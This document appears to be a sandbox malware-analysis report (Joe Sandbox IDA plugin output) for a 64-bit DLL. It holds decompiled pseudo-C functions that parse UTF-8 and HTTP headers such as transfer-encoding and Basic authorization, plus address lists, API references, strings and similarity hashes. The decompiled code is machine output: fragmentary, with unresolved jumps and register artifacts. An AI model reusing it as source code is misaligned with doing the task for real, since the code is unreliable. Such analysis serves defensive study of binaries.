				if ( *((intOrPtr*)(_t356 + 8)) == 0) goto 0xf30be301;
				HeapFree(??, ??, ??);
				goto 0xf30be301;
				_t336 = _t356;
				E000007FE7FEF30515F0(_t284, _t368 + 0x70, _t336,  *((intOrPtr*)(_t356 + 8)));
				if ( *((intOrPtr*)(_t368 + 0x70)) != 0) goto 0xf30be318;
				E000007FE7FEF30A60D2(_t284,  *((intOrPtr*)(_t368 + 0x80)));
				 *((long long*)(_t368 + 0x58)) = _t284;
				 *((long long*)(_t368 + 0x60)) = _t336;
				 *((long long*)(_t368 + 0x68)) = _t284;
				asm("xorps xmm0, xmm0");
				_t298 = _t368 + 0xe0;
				asm("movups [ebx+0x8], xmm0");
				asm("movups [ebx+0x20], xmm0");
				 *((long long*)(_t298 + 0x2d)) = _t284;
				 *_t298 = _t284;
				 *((long long*)(_t298 + 0x18)) = _t284;
				 *(_t368 + 0x20) = _t406;
				_t337 = _t298;
				E000007FE7FEF305BD30();
				if ( *((char*)(_t298 + 0x32)) == 0) goto 0xf30be447;
				_t299 =  *((intOrPtr*)(_t368 + 0x58));
				_t365 =  *((intOrPtr*)(_t368 + 0x68));
				if (_t365 == 0) goto 0xf30be3e7;
				_t246 =  *((char*)(_t299 + _t365 - 1)) - 0x2e;
				if (_t246 != 0) goto 0xf30be39b;
				_t366 = _t365 - 1;
				if (_t246 == 0) goto 0xf30be3e7;
				_t358 = _t368 + 0x90;
				 *_t358 = _t284;
				 *((long long*)(_t358 + 8)) = _t366;
				 *((long long*)(_t358 + 0x10)) = _t299;
				 *((long long*)(_t358 + 0x18)) = _t366;
				 *((long long*)(_t358 + 0x20)) = _t284;
				 *((long long*)(_t358 + 0x28)) = _t366;
				 *((long long*)(_t358 + 0x30)) = 1;
				 *((long long*)(_t358 + 0x38)) = 0x2e;
				 *((short*)(_t358 + 0x40)) = 1;
				E000007FE7FEF305EE14(_t358, _t337);
				if (_t284 == 0) goto 0xf30be3e0;
				if (_t337 != 0) goto 0xf30be3ce;
				if (_t284 != 0) goto 0xf30be3e9;
				goto 0xf30be3ee;
				 *((char*)(_t368 + 0x4a)) = 1;
				if (_t366 - 0xfd > 0) goto 0xf30be442;
				_t359 = _t368 + 0x90;
				 *_t359 = _t284;
				 *((long long*)(_t359 + 8)) = _t366;
				 *((long long*)(_t359 + 0x10)) = _t299;
				 *((long long*)(_t359 + 0x18)) = _t366;
				 *((long long*)(_t359 + 0x20)) = _t284;
				 *((long long*)(_t359 + 0x28)) = _t366;
				 *((long long*)(_t359 + 0x30)) = 1;
				 *((long long*)(_t359 + 0x38)) = 0x2e;
				 *((short*)(_t359 + 0x40)) = 1;
				E000007FE7FEF305EE14(_t359, _t337);
				if (_t284 == 0) goto 0xf30be43d;
				if (_t337 - 0x40 < 0) goto 0xf30be42a;
				_t253 = _t284;
				if (_t253 == 0) goto 0xf30be447;
				 *(_t368 + 0x49) = 1;
				r13b =  *((intOrPtr*)(_t368 + 0x41));
				r14b =  *((intOrPtr*)(_t368 + 0x42));
				r12b =  *((intOrPtr*)(_t368 + 0x43));
				r11b =  *((intOrPtr*)(_t368 + 0x44));
				r10b =  *((intOrPtr*)(_t368 + 0x45));
				r9b =  *((intOrPtr*)(_t368 + 0x46));
				r8b =  *(_t368 + 0x47);
				r15d =  *(_t368 + 0x49) & 0x000000ff;
				if (_t253 != 0) goto 0xf30be4da;
				if (r13b != 0) goto 0xf30be4da;
				if ( *((intOrPtr*)(_t368 + 0x4b)) != 0) goto 0xf30be4da;
				 *((char*)(_t368 + 0x37)) =  *((intOrPtr*)(_t368 + 0x60));
				r13d =  *(_t368 + 0x61);
				goto 0xf30be500;
				 *((long long*)(_t368 + 0x38)) =  *((intOrPtr*)(_t368 + 0x58));
				if (( *(_t368 + 0x67) & 0x000000ff) << 0x10 != 2) goto 0xf30be50a;
				 *((intOrPtr*)(_t368 + 0x37)) = bpl;
				_t392 =  *((intOrPtr*)(_t368 + 0x38));
				goto 0xf30be58b;
				 *((char*)(_t368 + 0x37)) = 0;
				r13d = r8b & 0xffffffff;
				_t405 = _t337 << 0x00000018 | _t359 << 0x00000010 | _t406 << 0x00000008 | 0x0000002e;
				if ( *((intOrPtr*)(_t368 + 0x60)) == 0) goto 0xf30be588;
				HeapFree(??, ??, ??);
				r12d = 0;
				_t409 =  *((intOrPtr*)(_t368 + 0x50));
				if ( *((long long*)(_t368 + 0xe8)) == 0) goto 0xf30be5b2;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t368 + 0x100)) == 0) goto 0xf30be5d4;
				HeapFree(??, ??, ??);
				if (_t392 == 0) goto 0xf30be69e;
				if (_t405 == 0) goto 0xf30be6a6;
				_t338 = _t392;
				if (_t338 == _t392 + _t405) goto 0xf30be70a;
				_t189 =  *_t338;
				_t169 = _t189 & 0x000000ff;
				if (_t169 < 0) goto 0xf30be60e;
				_t339 = _t338 + 1;
				goto 0xf30be670;
				if (_t169 - 0xdf <= 0) goto 0xf30be659;
				_t123 = _t339 + 3; // 0x3
				_t300 = _t123;
				_t216 = ( *(_t339 + 1) & 0x3f) << 6;
				if (_t189 - 0xf0 < 0) goto 0xf30be666;
				_t221 = (_t169 & 7) << 0x12;
				_t211 = ( *(_t339 + 2) & 0x3f | _t216) << 6;
				if (( *_t300 & 0x3f | _t211 | _t221) == 0x110000) goto 0xf30be70a;
				goto 0xf30be670;
				goto 0xf30be670;
				_t175 = _t211 | (_t221 << 0x00000006 | _t216) << 0x0000000c;
				if (_t175 - 0x20 < 0) goto 0xf30be691;
				_t268 = _t300 - 0x20 - 0x3e;
				if (_t268 > 0) goto 0xf30be683;
				asm("dec ecx");
				if (_t268 < 0) goto 0xf30be691;
				if (_t175 == 0x7c) goto 0xf30be691;
				_t270 = _t175 - 0x7f;
				if (_t270 != 0) goto 0xf30be5f7;
				 *_t409 = 0x503;
				r14b =  *((intOrPtr*)(_t368 + 0x37));
				goto 0xf30be6b5;
				 *_t409 = 0x103;
				goto 0xf30be6d4;
				r14b =  *((intOrPtr*)(_t368 + 0x37));
				 *((char*)(_t409 + 1)) = 0;
				 *_t409 = 3;
				if (_t270 == 0) goto 0xf30be6d4;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t368 + 0x70)) == 0) goto 0xf30be6f5;
				if ( *((long long*)(_t368 + 0x78)) == 0) goto 0xf30be6f5;
				return HeapFree(??, ??, ??);
			}

0x7fef30be068
0x7fef30be087
0x7fef30be08c
0x7fef30be093
0x7fef30be09d
0x7fef30be0a7
0x7fef30be0ad
0x7fef30be0b0
0x7fef30be0b4
0x7fef30be0bf
0x7fef30be0c5
0x7fef30be0cd
0x7fef30be0da
0x7fef30be0df
0x7fef30be0e4
0x7fef30be0ed
0x7fef30be0f2
0x7fef30be0f5
0x7fef30be0f9
0x7fef30be106
0x7fef30be10f
0x7fef30be114
0x7fef30be116
0x7fef30be119
0x7fef30be121
0x7fef30be128
0x7fef30be137
0x7fef30be13e
0x7fef30be149
0x7fef30be154
0x7fef30be15c
0x7fef30be16d
0x7fef30be172
0x7fef30be17d
0x7fef30be17f
0x7fef30be18d
0x7fef30be196
0x7fef30be19a
0x7fef30be19e
0x7fef30be1a9
0x7fef30be1ad
0x7fef30be1b2
0x7fef30be1bf
0x7fef30be1c6
0x7fef30be1d0
0x7fef30be1d8
0x7fef30be1df
0x7fef30be1e4
0x7fef30be1eb
0x7fef30be1f4
0x7fef30be200
0x7fef30be21a
0x7fef30be221
0x7fef30be229
0x7fef30be22b
0x7fef30be264
0x7fef30be269
0x7fef30be26b
0x7fef30be270
0x7fef30be275
0x7fef30be27d
0x7fef30be283
0x7fef30be285
0x7fef30be295
0x7fef30be297
0x7fef30be2ac
0x7fef30be2b5
0x7fef30be2bb
0x7fef30be2c3
0x7fef30be2cb
0x7fef30be2d3
0x7fef30be2db
0x7fef30be2e9
0x7fef30be2ef
0x7fef30be2f6
0x7fef30be2fc
0x7fef30be311
0x7fef30be31b
0x7fef30be320
0x7fef30be325
0x7fef30be32c
0x7fef30be331
0x7fef30be334
0x7fef30be33c
0x7fef30be340
0x7fef30be344
0x7fef30be34d
0x7fef30be350
0x7fef30be354
0x7fef30be35e
0x7fef30be367
0x7fef30be370
0x7fef30be376
0x7fef30be37b
0x7fef30be38d
0x7fef30be38f
0x7fef30be394
0x7fef30be396
0x7fef30be399
0x7fef30be39d
0x7fef30be3a5
0x7fef30be3a8
0x7fef30be3ac
0x7fef30be3b0
0x7fef30be3b4
0x7fef30be3b8
0x7fef30be3bc
0x7fef30be3c4
0x7fef30be3c8
0x7fef30be3d1
0x7fef30be3d9
0x7fef30be3de
0x7fef30be3e3
0x7fef30be3e5
0x7fef30be3e9
0x7fef30be3f5
0x7fef30be3f9
0x7fef30be401
0x7fef30be404
0x7fef30be408
0x7fef30be40c
0x7fef30be410
0x7fef30be414
0x7fef30be418
0x7fef30be420
0x7fef30be424
0x7fef30be42d
0x7fef30be435
0x7fef30be43b
0x7fef30be43d
0x7fef30be440
0x7fef30be442
0x7fef30be44b
0x7fef30be450
0x7fef30be455
0x7fef30be45a
0x7fef30be45f
0x7fef30be464
0x7fef30be469
0x7fef30be473
0x7fef30be4a5
0x7fef30be4aa
0x7fef30be4ae
0x7fef30be4b9
0x7fef30be4d0
0x7fef30be4d8
0x7fef30be4df
0x7fef30be4eb
0x7fef30be4f6
0x7fef30be4fb
0x7fef30be505
0x7fef30be50a
0x7fef30be54f
0x7fef30be56c
0x7fef30be572
0x7fef30be582
0x7fef30be588
0x7fef30be58b
0x7fef30be599
0x7fef30be5ac
0x7fef30be5bb
0x7fef30be5ce
0x7fef30be5d7
0x7fef30be5e0
0x7fef30be5f4
0x7fef30be5fa
0x7fef30be600
0x7fef30be602
0x7fef30be607
0x7fef30be609
0x7fef30be60c
0x7fef30be61d
0x7fef30be61f
0x7fef30be61f
0x7fef30be627
0x7fef30be632
0x7fef30be63a
0x7fef30be63d
0x7fef30be64d
0x7fef30be657
0x7fef30be664
0x7fef30be66e
0x7fef30be673
0x7fef30be678
0x7fef30be67b
0x7fef30be67d
0x7fef30be681
0x7fef30be686
0x7fef30be688
0x7fef30be68b
0x7fef30be691
0x7fef30be697
0x7fef30be69c
0x7fef30be69e
0x7fef30be6a4
0x7fef30be6a8
0x7fef30be6ad
0x7fef30be6b1
0x7fef30be6c0
0x7fef30be6ce
0x7fef30be6dc
0x7fef30be6e4
0x7fef30be709

APIs

HeapFree.KERNEL32 ref: 000007FEF30BE2E9
HeapFree.KERNEL32 ref: 000007FEF30BE582
HeapFree.KERNEL32 ref: 000007FEF30BE5AC
HeapFree.KERNEL32 ref: 000007FEF30BE5CE
HeapFree.KERNEL32 ref: 000007FEF30BE6CE
HeapFree.KERNEL32 ref: 000007FEF30BE6EF
HeapFree.KERNEL32 ref: 000007FEF30BE894
HeapFree.KERNEL32 ref: 000007FEF30BE914
HeapFree.KERNEL32 ref: 000007FEF30BE9AA
HeapFree.KERNEL32 ref: 000007FEF30BEADD
HeapFree.KERNEL32 ref: 000007FEF30BEB0D

Strings

., xrefs: 000007FEF30BE738
a non-empty list of numbers, xrefs: 000007FEF30BEB69
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30BEB3B

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: .$a non-empty list of numbers$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 3298025750-3902913355
Opcode ID: 94f52c6af2fa4d82c38088197d1eebdb6fab5f66d066fdbe684e00099d17ef93
Instruction ID: 5bac3f47502c2cb4b0a1b4cf29e6fb87f07407e8573285dd6ef493014b5a4d47
Opcode Fuzzy Hash: 94f52c6af2fa4d82c38088197d1eebdb6fab5f66d066fdbe684e00099d17ef93
Instruction Fuzzy Hash: 3452B332A0DBC189E7A08B21B4543BAB7E2F785784F544127DADD437A9DB3CE485E740

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF309D940 Relevance: 18.4, APIs: 12, Instructions: 393
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E000007FE7FEF309D940(long long __rax, long long __rcx, signed char* __rdx, void* __r8) {
				int _t51;
				void* _t53;
				signed char _t65;
				signed int _t89;
				void* _t125;
				intOrPtr _t130;
				signed long long _t133;
				long long _t134;
				short* _t140;
				signed long long _t147;
				void* _t154;
				void* _t155;
				void* _t168;

				_t154 = _t155 + 0x80;
				 *((long long*)(_t154 + 0x410)) = 0xfffffffe;
				_t167 = __r8;
				 *((long long*)(_t154 + 0x400)) = __rcx;
				_t133 = __r8 + __r8 + 2;
				E000007FE7FEF305A520();
				if (__rax == 0) goto 0xf309defc;
				_t5 = _t167 + 1; // 0x9
				 *((long long*)(_t154 - 0x60)) = __rax;
				 *((long long*)(_t154 - 0x58)) = _t5;
				 *((long long*)(_t154 - 0x50)) = 0;
				_t168 = __r8 + __rdx;
				r13d = 0;
				goto 0xf309d9fe;
				_t160 =  <  ? 0xffffffff : _t168 - __rdx + 3;
				_t161 = ( <  ? 0xffffffff : _t168 - __rdx + 3) >> 2;
				asm("dec ecx");
				_t162 = (( <  ? 0xffffffff : _t168 - __rdx + 3) >> 2) + 2;
				_t147 = _t133;
				E000007FE7FEF30FF950(_t53, 2, r13w - 1, _t154 - 0x60, _t147, (( <  ? 0xffffffff : _t168 - __rdx + 3) >> 2) + 2);
				 *((short*)( *((intOrPtr*)(_t154 - 0x60)) + _t133 * 2)) = 0;
				_t134 = _t133 + 1;
				 *((long long*)(_t154 - 0x50)) = _t134;
				if (r13d == 0) goto 0xf309da10;
				r13d = 0;
				goto 0xf309daa0;
				if (__rdx == _t168) goto 0xf309dae4;
				_t65 =  *__rdx & 0x000000ff;
				if (sil < 0) goto 0xf309da2a;
				goto 0xf309daa0;
				if (sil - 0xdf <= 0) goto 0xf309da6c;
				if (_t65 - 0xf0 < 0) goto 0xf309da7d;
				goto 0xf309da86;
				goto 0xf309daa0;
				_t89 = (_t65 & 7) << 0x00000012 << 0x00000006 | (__rdx[2] & 0x3f) << 0x00000006 | ((_t65 & 7) << 0x00000012 << 0x00000006 | (__rdx[2] & 0x3f) << 0x00000006) << 0x0000000c;
				if (_t89 - 0xffff > 0) goto 0xf309dab1;
				asm("o16 nop [cs:eax+eax]");
				if (_t134 !=  *((intOrPtr*)(_t154 - 0x58))) goto 0xf309d9f1;
				goto 0xf309d9c0;
				r13d = _t89 + 0xffff0000 & 0x000003ff | 0x0000dc00;
				if (_t134 !=  *((intOrPtr*)(_t154 - 0x58))) goto 0xf309d9f1;
				goto 0xf309d9c0;
				if (_t134 - 8 < 0) goto 0xf309db3f;
				_t140 =  *((intOrPtr*)(_t154 - 0x60));
				if ( *_t140 == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 2)) == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 4)) == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 6)) == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 8)) == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 0xa)) == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 0xc)) == 0) goto 0xf309db64;
				if ( *((short*)(_t140 + 0xe)) == 0) goto 0xf309db64;
				_t125 = _t134 + 0xfffffff8;
				if (_t125 - 7 > 0) goto 0xf309dafa;
				asm("o16 nop [cs:eax+eax]");
				if (_t125 + _t125 == _t147) goto 0xf309dc0e;
				if ( *((short*)(_t140 + 0x10 + _t147)) != 0) goto 0xf309db50;
				if ( *((long long*)(_t154 - 0x58)) == 0) goto 0xf309db7a;
				HeapFree(??, ??, ??);
				if (0 != 1) goto 0xf309dbef;
				 *((long long*)(_t154 + 0x408)) = 0x7fef3126a4f;
				 *((long long*)(_t154 + 0x3f0)) = 0xf3126a50;
				 *((intOrPtr*)( *0x7FEF3126A57))();
				_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x3f0)) + 7));
				if ( *((long long*)(_t130 + 8)) == 0) goto 0xf309dbdd;
				if ( *((long long*)(_t130 + 0x10)) - 0x11 < 0) goto 0xf309dbce;
				HeapFree(??, ??, ??);
				_t51 = HeapFree(??, ??, ??);
				 *((char*)( *((intOrPtr*)(_t154 + 0x400)) + 0x18)) = 2;
				return _t51;
			}

0x7fef309d953
0x7fef309d95b
0x7fef309d966
0x7fef309d96c
0x7fef309d977
0x7fef309d983
0x7fef309d98b
0x7fef309d991
0x7fef309d996
0x7fef309d99a
0x7fef309d99e
0x7fef309d9a6
0x7fef309d9b6
0x7fef309d9bb
0x7fef309d9ca
0x7fef309d9ce
0x7fef309d9d7
0x7fef309d9db
0x7fef309d9e2
0x7fef309d9e5
0x7fef309d9f1
0x7fef309d9f5
0x7fef309d9f8
0x7fef309da01
0x7fef309da03
0x7fef309da06
0x7fef309da13
0x7fef309da19
0x7fef309da23
0x7fef309da28
0x7fef309da3b
0x7fef309da4d
0x7fef309da6a
0x7fef309da7b
0x7fef309da84
0x7fef309da90
0x7fef309da92
0x7fef309daa6
0x7fef309daac
0x7fef309dace
0x7fef309dad9
0x7fef309dadf
0x7fef309daf2
0x7fef309daf4
0x7fef309dafe
0x7fef309db05
0x7fef309db0c
0x7fef309db13
0x7fef309db1a
0x7fef309db21
0x7fef309db28
0x7fef309db2f
0x7fef309db35
0x7fef309db3d
0x7fef309db44
0x7fef309db53
0x7fef309db62
0x7fef309db69
0x7fef309db74
0x7fef309db89
0x7fef309db8f
0x7fef309db9e
0x7fef309dba5
0x7fef309dbae
0x7fef309dbbe
0x7fef309dbc8
0x7fef309dbd7
0x7fef309dbe9
0x7fef309dbf6
0x7fef309dc0d

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 5c7cb41fe36a8fc2ccd4ec489e01f24364ee38f64119c14988f552d9c6a52eac
Instruction ID: 24f4c197a645f99d056b67ddacd02144ad56353005513fa2f68a5c6f2923ca6e
Opcode Fuzzy Hash: 5c7cb41fe36a8fc2ccd4ec489e01f24364ee38f64119c14988f552d9c6a52eac
Instruction Fuzzy Hash: 40F1AD72E09BC289EBA48B25D8443A927A3F344B98F048137CE5D177E8EB7CD585E350

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B67DC Relevance: 16.9, APIs: 5, Strings: 6, Instructions: 392
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E000007FE7FEF30B67DC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __esp, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* __r10, void* __r11, intOrPtr* _a40, intOrPtr* _a48, long long _a60, intOrPtr _a68) {
				long long _v80;
				long long _v88;
				long long _v104;
				char _v112;
				long long _v120;
				char _v128;
				long long _v136;
				signed int* _v144;
				char _v167;
				char _v168;
				char _v216;
				signed int* _v224;
				char _v232;
				char _v248;
				long long _v256;
				char _v264;
				void* _v272;
				long long _v280;
				long long _v288;
				void* _v296;
				long long _v304;
				intOrPtr _v312;
				void* _v320;
				long long _v328;
				char _v340;
				long long _v344;
				void* _t111;
				void* _t121;
				void* _t156;
				void* _t159;
				void* _t181;
				long long _t184;
				signed int* _t187;
				long long _t196;
				intOrPtr* _t200;
				char _t204;
				long long _t212;
				long long _t232;
				void* _t234;
				long long _t235;
				long long* _t240;
				long long* _t242;
				long long _t250;
				long long _t254;
				intOrPtr* _t255;
				char* _t256;
				intOrPtr _t257;
				long long _t261;
				intOrPtr* _t265;
				intOrPtr _t267;
				char* _t268;
				long long _t269;
				void* _t289;
				long long _t290;
				intOrPtr* _t293;
				long long* _t294;
				long long* _t296;
				long long _t297;
				intOrPtr* _t298;

				_t289 = __r11;
				_t288 = __r10;
				_t286 = __r9;
				_t184 = __rax;
				_t156 = __edi;
				_v280 = __r8;
				_t290 = __rdx;
				_v272 = __rcx;
				_t200 = _a48;
				_t250 =  *_t200;
				_t269 =  *((intOrPtr*)(_t200 + 0x10));
				r9d = 0x11;
				_t232 = _t269;
				E000007FE7FEF30B7D80(_t159, __rax, _t250, _t232, "transfer-encoding", __r9);
				if (_t184 == 0) goto 0xf30b68d5;
				_v288 = _t250;
				_v296 = _t290;
				_v328 = __r9;
				_t296 =  &_v216;
				 *((long long*)(_t296 - 0x10)) = _t261;
				 *((long long*)(_t296 - 8)) = _t232;
				 *_t296 = _t184;
				 *((long long*)(_t296 + 8)) = _t232;
				 *((long long*)(_t296 + 0x10)) = _t261;
				 *((long long*)(_t296 + 0x18)) = _t232;
				 *((long long*)(_t296 + 0x20)) = 1;
				 *((long long*)(_t296 + 0x28)) = 0x2c;
				 *((short*)(_t296 + 0x30)) = 1;
				_t111 = E000007FE7FEF30A6A7C( &_v264, _t296);
				if (_v264 == 0) goto 0xf30b68ee;
				_t204 = _v232;
				_v232 = _v248;
				if (_v167 == 0) goto 0xf30b6885;
				goto 0xf30b6928;
				_v320 = 8;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x40], xmm0");
				sil = 1;
				goto 0xf30b6982;
				if (_v167 != 0) goto 0xf30b691f;
				_t187 = _v224;
				if (_v168 != 0) goto 0xf30b6ea5;
				if (_t187 != _v232) goto 0xf30b6ea5;
				if (_v216 + _t204 == 0) goto 0xf30b6dab;
				_t234 = _v256 - _t204;
				E000007FE7FEF306916D(_t111, _v216 + _t204, _t234, __r10);
				_t297 = _v328;
				if (_t234 != 7) goto 0xf30b6959;
				goto 0xf30b695b;
				_t293 = _v296;
				sil = _t232 == 0;
				_v320 = 8;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x40], xmm0");
				if (0 == 2) goto 0xf30b6982;
				if (0 != 2) goto 0xf30b69a5;
				r9d = 0xe;
				_t235 = _t269;
				E000007FE7FEF30B7D80(0, _t187, _v288, _t235, "content-lengthcontent-encoding", _t286);
				if (_t187 == 0) goto 0xf30b6d1f;
				_v328 = 0;
				E000007FE7FEF30BD43A(_a40, "content-lengthcontent-encoding");
				_v144 = _t187;
				_v136 = _t235;
				E000007FE7FEF30BD504(0x64656b6e ^ _t187[0] | 0x6e756863 ^  *_t187, _a40, "content-lengthcontent-encoding", _t288);
				_t210 =  !=  ? _t187 : "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				_t236 =  ==  ? _t187 : _t235;
				_v128 =  !=  ? _t187 : "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				_v120 =  ==  ? _t187 : _t235;
				if (_t187 == 0) goto 0xf30b6bb8;
				r9d = 0xd;
				E000007FE7FEF30B7D80(0, _t187,  *_t200,  *((intOrPtr*)(_t200 + 0x10)), "authorizationAuthorizationBasic ", _t286);
				if (_t187 != 0) goto 0xf30b6bb8;
				_t212 =  &_v264;
				 *_t212 =  &_v144;
				 *((long long*)(_t212 + 8)) = 0x7fef3096a50;
				 *((long long*)(_t212 + 0x10)) =  &_v128;
				 *((long long*)(_t212 + 0x18)) = 0x7fef3096a50;
				_t240 =  &_v232;
				 *_t240 = 0xf314bb18;
				 *((long long*)(_t240 + 8)) = 0xf314bb18;
				 *((long long*)(_t240 + 0x10)) = 0;
				 *((long long*)(_t240 + 0x20)) = _t212;
				 *((long long*)(_t240 + 0x28)) = 0xf314bb18;
				_t265 =  &_v88;
				_t121 = E000007FE7FEF3051840(_t265, _t240);
				_t254 =  &_v112;
				E000007FE7FEF30B209F(_t121, 0, _t187, _t254,  *_t265,  *((intOrPtr*)(_t265 + 0x10)), _t289);
				if ( *((long long*)(_t265 + 8)) == 0) goto 0xf30b6aba;
				HeapFree(??, ??, ??);
				_v88 = _t254;
				_v80 = 0x7fef3051250;
				_t242 =  &_v232;
				 *_t242 = 0xf314c668;
				 *((long long*)(_t242 + 8)) = 0xf314c668;
				 *((long long*)(_t242 + 0x10)) = 0;
				 *((long long*)(_t242 + 0x20)) = _t265;
				 *((long long*)(_t242 + 0x28)) = 0xf314c668;
				_t255 =  &_v264;
				E000007FE7FEF3051840(_t255, _t242);
				_v344 =  *((intOrPtr*)(_t255 + 0x10));
				r8d = 0xd;
				E000007FE7FEF30B4DD8( &_v232,  &M000007FE7FEF314C653,  *_t265,  *_t255);
				if (_v304 != _v312) goto 0xf30b6b4f;
				_t256 =  &_v320;
				E000007FE7FEF30B1E0C(_v304 - _v312, _t256, _v304);
				asm("movups xmm0, [esp+0x90]");
				asm("movups xmm1, [esp+0xa0]");
				asm("movups [eax+ecx+0x10], xmm1");
				asm("movups [eax+ecx], xmm0");
				_v304 =  *((intOrPtr*)(_t256 + 0x10)) + 1;
				if (_v256 == 0) goto 0xf30b6b96;
				HeapFree(??, ??, ??);
				if (_v104 == 0) goto 0xf30b6bb8;
				HeapFree(??, ??, ??);
				_t267 = _v304;
				_t257 =  *((intOrPtr*)(_t200 + 0x10));
				_t196 =  *((intOrPtr*)(_t200 + 8)) - _t257;
				_t181 = _t196 - _t267;
				if (_t181 < 0) goto 0xf30b6eb8;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t200 + 0x10)) = _t257 + _t267;
				asm("lock dec eax");
				if (_t181 <= 0) goto 0xf30b6ecf;
				asm("lock dec ecx");
				if (_t181 <= 0) goto 0xf30b6ecf;
				E000007FE7FEF30694DF(0, _t196, _t297);
				_t294 = _v272;
				 *((long long*)(_t294 + 0x10)) = _t196;
				 *((long long*)(_t294 + 0x18)) = _v320;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t294 + 0x20)) = _t297;
				_t298 = _a40;
				_t268 =  &_v232;
				E000007FE7FEF3051C30(_t196, _t268,  *_t298,  *((intOrPtr*)(_t298 + 0x10)));
				asm("inc ecx");
				asm("inc ecx");
				 *((char*)(_t268 + 0x50)) =  *((intOrPtr*)(_t298 + 0x50));
				asm("movups [esi+0x40], xmm1");
				asm("inc ecx");
				asm("movups [esi+0x18], xmm0");
				asm("movups [esi+0x28], xmm1");
				 *((long long*)(_t268 + 0x38)) =  *((intOrPtr*)(_t298 + 0x38));
				 *((long long*)(_t294 + 0x90)) =  *((intOrPtr*)(_t200 + 0x10));
				asm("movups xmm0, [ebx]");
				asm("inc ecx");
				 *_t294 =  *_t293;
				 *((long long*)(_t294 + 8)) =  *((intOrPtr*)(_t293 + 8));
				memcpy(_t156, 0, 0xb);
				 *((char*)(_t294 + 0xa8)) = _v340;
				 *((long long*)(_t294 + 0x98)) = _a60;
				 *((intOrPtr*)(_t294 + 0xa0)) = _a68;
				E000007FE7FEF3073C6C(_v320,  *_t298);
				if (_v312 == 0) goto 0xf30b6d0a;
				return HeapFree(??, ??, ??);
			}

0x7fef30b67dc
0x7fef30b67dc
0x7fef30b67dc
0x7fef30b67dc
0x7fef30b67dc
0x7fef30b67f2
0x7fef30b67f7
0x7fef30b67fa
0x7fef30b67ff
0x7fef30b6807
0x7fef30b680a
0x7fef30b6815
0x7fef30b681e
0x7fef30b6821
0x7fef30b6829
0x7fef30b6832
0x7fef30b6837
0x7fef30b683c
0x7fef30b6843
0x7fef30b684b
0x7fef30b684f
0x7fef30b6853
0x7fef30b6857
0x7fef30b685b
0x7fef30b685f
0x7fef30b6863
0x7fef30b6875
0x7fef30b6879
0x7fef30b6893
0x7fef30b689e
0x7fef30b68ad
0x7fef30b68bb
0x7fef30b68ce
0x7fef30b68d3
0x7fef30b68d5
0x7fef30b68de
0x7fef30b68e1
0x7fef30b68e6
0x7fef30b68e9
0x7fef30b68f6
0x7fef30b6908
0x7fef30b6910
0x7fef30b6919
0x7fef30b6922
0x7fef30b692b
0x7fef30b692e
0x7fef30b6937
0x7fef30b6941
0x7fef30b6957
0x7fef30b695b
0x7fef30b6963
0x7fef30b6967
0x7fef30b6970
0x7fef30b6973
0x7fef30b697a
0x7fef30b6980
0x7fef30b6989
0x7fef30b6992
0x7fef30b6995
0x7fef30b699d
0x7fef30b69a5
0x7fef30b69b4
0x7fef30b69bc
0x7fef30b69c4
0x7fef30b69cf
0x7fef30b69de
0x7fef30b69e2
0x7fef30b69e6
0x7fef30b69ee
0x7fef30b69f9
0x7fef30b6a0d
0x7fef30b6a13
0x7fef30b6a1b
0x7fef30b6a29
0x7fef30b6a2e
0x7fef30b6a38
0x7fef30b6a44
0x7fef30b6a48
0x7fef30b6a53
0x7fef30b6a5b
0x7fef30b6a63
0x7fef30b6a67
0x7fef30b6a6f
